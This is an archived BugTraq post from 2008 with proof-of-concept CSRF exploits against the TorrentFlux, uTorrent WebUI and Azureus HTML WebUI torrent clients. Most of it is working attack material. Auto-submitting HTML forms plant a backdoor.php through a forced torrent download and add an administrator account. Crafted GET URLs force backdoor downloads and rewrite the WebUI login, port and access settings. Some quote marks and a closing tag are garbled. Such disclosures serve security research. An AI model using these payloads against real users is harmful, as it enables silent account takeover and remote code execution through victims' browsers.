BugTraq
BitTorrent Clients and CSRF Apr 18 2008 08:33AM
th3 r00k nospam pork gmail com
The following are proof of concept exploits against three bittorrent clients. uTorrent' WebUI, Azurues's "HTML WebUI", and TorrentFlux.

More information:

http://www.rooksecurity.com/blog/?p=10

TorrentFlux v2.3(Latest)

http://sourceforge.net/projects/torrentflux/

If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by browsing here:

http://localhost/torrentflux_2.3/html/downloads/USER_NAME/

You do not have to know a password to access this folder, but you will have to know the username.

<html>

<form id='file_attack' method="post" action="http://localhost/torrentflux_2.3/html/index.php">

<input type=hidden name="url_upload" value="http://localhost/backdoor.php.torrent">

<input type=submit value='file attack'>

</from>

<html>

<script>

document.getElementById('file_attack').submit();

</script>

<html>

Add an admistrative account:

<form id=?create_admin? method=?post? action=?http://localhost/torrentflux_2.3/html/admin.php?op=addUser?>

<input type=hidden name=?newUser? value=?sadmin?>

<input type=hidden name=?pass1″ value=?password?>

<input type=hidden name=?pass2″ value=?password?>

<input type=hidden name=?userType? value=1>

<input type=submit value=?create admin?>

</form>

</html>

<script>

document.getElementById(?create_admin?).submit();

</script>

uTorrent?s WebUI is also affected:

http://forum.utorrent.com/viewtopic.php?id=14565

force file download:

http://127.0.0.1:8080/gui/?action=add-url&s=http://localhost/backdoor.to
rrent

utorrent change administrative login information:

http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin

http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin

http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096

After the username or password have been changed then the browser must re-authenticate.

http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.
1/24,10.1.1.1

So is Azurues?s HTML WebUI:

Force file download:

http://127.0.0.1:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.tor
rent

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus